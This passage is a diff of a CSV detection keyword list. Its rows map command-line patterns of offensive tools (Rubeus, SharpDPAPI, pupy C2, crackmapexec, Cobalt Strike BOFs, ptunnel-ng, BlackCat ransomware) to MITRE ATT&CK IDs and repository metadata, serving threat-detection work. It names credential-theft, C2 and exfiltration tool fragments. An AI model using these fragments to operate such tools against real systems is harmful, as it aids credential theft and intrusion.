--priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* Process spawned with stolen token!*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* --propagated*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* proxychains *","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" -"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* ps /target:*.xml /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* ptt /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* ptunnel-ng*","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1043 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","3","285","60","2023-05-17T12:47:52Z","2017-12-19T18:10:35Z" "* --publickey * --ecmdigits 25 --verbose --private*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --publickey * --uncipherfile ./ciphered\_file*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* puppet-naivesigning.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyCredentials*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupylib.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupySocketStream*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyTCPServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketClient*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* PupyWebSocketServer*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* pyasn1 *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* pyasn1.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 
- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" 
@@ -1566,74 +1566,74 @@ "* quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "* radare *:* 
-ble*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "* rai-attack-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* rai-attack-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
